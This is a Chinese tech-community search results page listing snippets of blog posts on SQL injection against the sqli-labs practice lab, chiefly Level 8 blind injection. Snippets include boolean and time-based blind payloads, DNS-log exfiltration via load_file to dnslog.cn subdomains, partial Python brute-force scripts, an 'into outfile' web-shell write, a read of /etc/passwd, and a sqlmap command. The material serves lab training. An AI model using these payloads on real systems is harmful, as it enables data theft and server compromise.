首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏网络安全与证书

    【PTE-day04 SQL注入盲注】

    数据库常用函数length()#长度函数substr()#截取函数ascii()#阿斯科码转换count()#统计函数1、布尔盲注(1)判断数据库长度http://124.222.124.9:8888/Less id=1' and length(database())=8 --+(2)截取数据库名,判断字符的ascii码值http://124.222.124.9:8888/Less-8/? id=1' and ascii(substr((select database()),1,1))>114 --+http://124.222.124.9:8888/Less-8/? (3)判断表数量http://124.222.124.9:8888/Less-8/? information_schema.tables where table_schema=database())=4 --+️(4)猜测数据表的长度http://124.222.124.9:8888/Less

    39410编辑于 2023-11-17
  • 来自专栏tea9的博客

    1.3.1-SQL注入-SQL盲注-布尔盲注

    id=1' http://localhost:90/Less-8/? id=1' and left((select database()),1)='a'--+ http://localhost:90/Less-8/? id=1' and left((select database()),1)='s'--+ 显示正确第一位为s http://localhost:90/Less-8/? id=1' and (select database() regexp '^s')--+ http://localhost:90/Less-8/? id=1 and ascii((substr((select database()),1,1))=115--+ http://localhost:90/Less-8/?

    92940编辑于 2022-07-16
  • 来自专栏农夫安全

    注入学习之sqli-labs-5(第四次)

    上图是综合三个函数大概演示,看得懂就行 上面通过单引号的测试,我们已经知道sql语句 0x03 利用方式 接下来我们就可以构造攻击语句了 http://127.0.0.1/Less-8/? http://127.0.0.1/Less-8/? 接下来,我们只要去改变语句中标红色的位置,然后去猜测ascii的大小就可以了 http://127.0.0.1/Less-8/? http://127.0.0.1/Less-8/? 的字符,最终得出第一个表的表名 http://127.0.0.1/Less-8/?

    942100发布于 2018-03-29
  • 来自专栏字节脉搏实验室

    sql盲注

    个人的查看注入点的方式‘单引号,“双引号, http://localhost/sqli/Less-8/?id=1 #正常 http://localhost/sqli/Less-8/? id=1 ‘ #不正常 http://localhost/sqli/Less-8/?id=1 " #正常 接下来就是构造闭合 http://localhost/sqli/Less-8/? http://localhost/sqli/Less-8/?id=1 ‘ and 1=1--+ #正常 http://localhost/sqli/Less-8/? http://localhost/sqli/Less-8/? http://localhost/sqli/Less-8/?

    1.2K10发布于 2020-05-12
  • 来自专栏行云博客

    SQL注入之dns回显注入

    ://dnsbin.zhack.ca/ http://dnslog.cn/ http://ceye.io/ pyload: 查库 http://192.168.232.128/sqllabs/Less load_file(concat("\\\\",database(),".kkc53r.dnslog.cn\\xxx.txt")) --+ 查表 http://192.168.232.128/sqllabs/Less where table_schema='security'),".kkc53r.dnslog.cn\\xxx.txt")) --+ 查列 http://192.168.232.128/sqllabs/Less table_name='users'),".kkc53r.dnslog.cn\\xxx.txt")) --+ 查数据(ps:子域名长度不能超过63个字符) http://192.168.232.128/sqllabs/Less

    1.6K10发布于 2020-08-11
  • 来自专栏代码审计

    用python写一个自动化盲注脚本

    具体如下: 获取数据库长度 127.0.0.1/sql/Less-8/? 127.0.0.1/sql/Less-8/? id=1' and if(ascii(substr(database(),1,1))=115,1,0) %23 获取数据库表的数量 127.0.0.1/sql/Less-8/? 127.0.0.1/sql/Less-8/? id=1' and if((select count(username) from users)=13,1,0) %23 获取字段数据的长度 127.0.0.1/sql/Less-8/?

    2.3K11发布于 2021-11-09
  • 来自专栏信安之路

    sql注入学习总结

    先判断当前数据库的长度 http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(database())>8 --+ 发现当值为8的时候,页面就没有显示。 获取表长度 http://127.0.0.1/sqli-labs/Less-8/? 那么说明表的长度是6 获取表名 和上面类似,只需要把payload修改为下面即可: http://127.0.0.1/sqli-labs/Less-8/? where table_schema=database() limit 0,1),{0},1))>{1} %23 获取列名 payload = "http://127.0.0.1/sqli-labs/Less 获取表名: payload = "http://127.0.0.1/sqli-labs/Less-8/?

    99000发布于 2018-08-08
  • 来自专栏yuancao博客

    dnslog带出——sqli-labs第8关

    库名 回到第8关,在URL里输入payload,刷新一下 http://172.16.11.54/sqli-labs/Less-8/? 表名 http://172.16.11.54/sqli-labs/Less-8/?

    82442发布于 2020-08-11
  • SQL注入常用姿势

    先判断当前数据库的长度 http://127.0.0.1/sqli-labs/Less-8/?id=1' and length(database())>8 --+发现当值为8的时候,页面就没有显示。 那么说明database()的长度是8获取数据库名可以使用如下脚本猜解数据库名字:获取表长度 http://127.0.0.1/sqli-labs/Less-8/? 那么说明表的长度是6获取表名和上面类似,只需要把payload修改为下面即可: http://127.0.0.1/sqli-labs/Less-8/? where table_schema=database() limit 0,1),{0},1))>{1} %23获取列名 payload = "http://127.0.0.1/sqli-labs/Less 获取表名: payload = "http://127.0.0.1/sqli-labs/Less-8/?

    33310编辑于 2024-05-30
  • 来自专栏XRSec.Blog

    延时注学习

    字符我们来拼接一下 1-115 ,2-101,3-99,4-117,5-114,6-105,7-116,8-121 对应 ascii 表最终得到库名为 security http://127.0.0.1/Less 猜表名 构造语句 http://127.0.0.1/Less-8/index.php? table_schema=database() limit 1,1),1,1))>113,sleep(10),1);–+ 符合条件说明,第一个ascii大于113 http://127.0.0.1/Less table_schema=database() limit 1,1),1,1))>115,sleep(10),1);–+ 不符合条件,第一个ascii不大于115 http://127.0.0.1/Less 我们来猜解一下列名 构造语句 http://127.0.0.1/Less-8/index.php?

    1.6K20编辑于 2022-02-13
  • 来自专栏ChaMd5安全团队

    SQLI-LABS 更新帖(二)

    Less-8 /sqli-labs/Less-8/? mysql中ascii()函数: 将字符转为ascii值 /sqli-labs/Less-8/? id=1' and (length(database())) = 8 -- - //页面回显正常说明数据库长度为8 /sqli-labs/Less-8/? id=1' and (ascii(substr((select database()) ,1,1))) = 115 -- - //页面回显正常说明第一个字符为s /sqli-labs/Less-8/

    1.1K100发布于 2018-03-29
  • 来自专栏网安菜鸟成长记

    sql-labs-less8|SQL注入,脚本注入

    前言: 此篇为sql-labs系列less-8,这一关使用脚本盲注,使用的sql语句跟第五关差不多,脚本写的比较烂,我也是第一次写,很基础,如果你也不会写的话可以参考一下。 本关如果注入语句执行成功页面就会显示You are in ……,如果注入语句没有被数据库执行页面无任何回显 请参考脚本: import requests url = "http://localhost/sql-labs/Less

    1.4K10发布于 2020-10-28
  • 来自专栏安恒网络空间安全讲武堂

    sql盲注的学习

    这里基本就可以确定可以使用布尔盲注来获得数据库中的数据 接下来我们来猜解库名,在猜解库名之前,我们首先需要知道库名的长度 这里我们就可以利用length()函数来进行长度的爆破: http://127.0.0.1/sqli-labs/Less 接下来开始进行库名的猜解,这里用到了ascii()函数和substr()函数,具体的语句如下: http://127.0.0.1/sqli-labs/Less-8/? break return table_name if __name__ == '__main__': base_url = "http://127.0.0.1/sqli-labs/Less

    1K30发布于 2019-09-28
  • 来自专栏网络安全自修室

    Sqlilabs通关笔记(二)

    存在注入点判断 通过反斜杠可知,错误和正常页面有区别 可以构造payload来进行判断布尔值,从而确定要查询的结果 http://127.0.0.1/sqlilabs2/Less-8/index.php id=1' and 's'=left(database(),1)--+ 页面正常 说明第一个字母为s http://127.0.0.1/sqlilabs2/Less-8/index.php? stringimport requestsfrom time import sleep arlist = string.printable Baseurl = "http://127.0.0.1/sqlilabs2/Less 0.2) if __name__ == "__main__": main() SQLMAP注入 直接上payload sqlmap -u "http://127.0.0.1/sqlilabs2/Less

    76920发布于 2020-07-22
  • 来自专栏我的网安魔法之旅

    sqli-labs靶场 (level 1-18)

    phpStudy/PHPTutorial/WWW/sqli-labs-master/Less-7" --+ 然后蚁剑连接即可(这一关参考了一位师傅的解) 具体导入导出文件的sql注入原理可参考这篇文章 Less @_.' database = '' global length for l in range(1,20): Url = 'http://127.0.0.1/sqli-labs-master/Less chars: charAscii = ord(char) #char转换为ascii url = 'http://127.0.0.1/sqli-labs-master/Less

    1.3K30编辑于 2023-05-16
  • 来自专栏kali blog

    sqli-labs通关笔记(1-30)

    id=1')) UNION SELECT 1,2,3 into outfile "\WWW\\sqli\\Less-7\\1.php"%23 less-8 9 10 基于布尔/时间的盲注 我们尝试用各种构造 ,都提示的是 You are in…… 构造如下: http://127.0.0.1/sqlilabs/Less-8/?

    2.6K20编辑于 2022-04-15
  • 来自专栏Ms08067安全实验室

    零基础学SQL注入必练靶场之SQLiLabs(搭建+打靶)

    20outfile%20%22F:/res1.txt%22%20--+ 十、第八关 判断回显位置,闭合方式为单引号闭合http://127.0.0.1/sqlilab/sqli-labs-master/Less requests import string mystring = string.printable #所有可⻅字符 url='http://127.0.0.1/sqlilab/sqli-labs-master/Less

    6.5K30编辑于 2022-12-22
  • 来自专栏渗透云笔记

    SQL注入的几种类型和原理

    http://wuhash.ml/Less-8/? 其他函数组成的payload,这里就不详细讲了 http://wuhash.ml/Less-8/? information_schema.tables where table_schema=database() limit 0,1) regexp '^em' --+ http://wuhash.ml/Less information_schema.tables where table_schema=database() limit 0,1) like 'em%' --+ http://wuhash.ml/Less

    6.3K52发布于 2019-10-09
  • 来自专栏安恒网络空间安全讲武堂

    Sqli_labs65关通关详解(上)

    >' into outfile "D:\\phpstudy\\WWW\\shell.php" %23 Less-8 构造个bool条件进行盲注,直接用之前写的那个盲注模板脚本就行。 基于时间的注入 写了两个简单的脚本: # -*- coding: utf-8 -*- import requests import time url = 'http://127.0.0.1/sqli/Less break print result # -*- coding: utf-8 -*- import requests import time url = 'http://127.0.0.1/sqli/Less

    2K60发布于 2018-02-06
  • 来自专栏网络安全自修室

    SQL注入笔记总结

    (SELECT load_file(‘/etc/passwd’))–+ 写文件 union select 1,’‘ into outfile ‘C:\phpStudy\PHPTutorial\WWW\Less

    95132发布于 2020-08-31
领券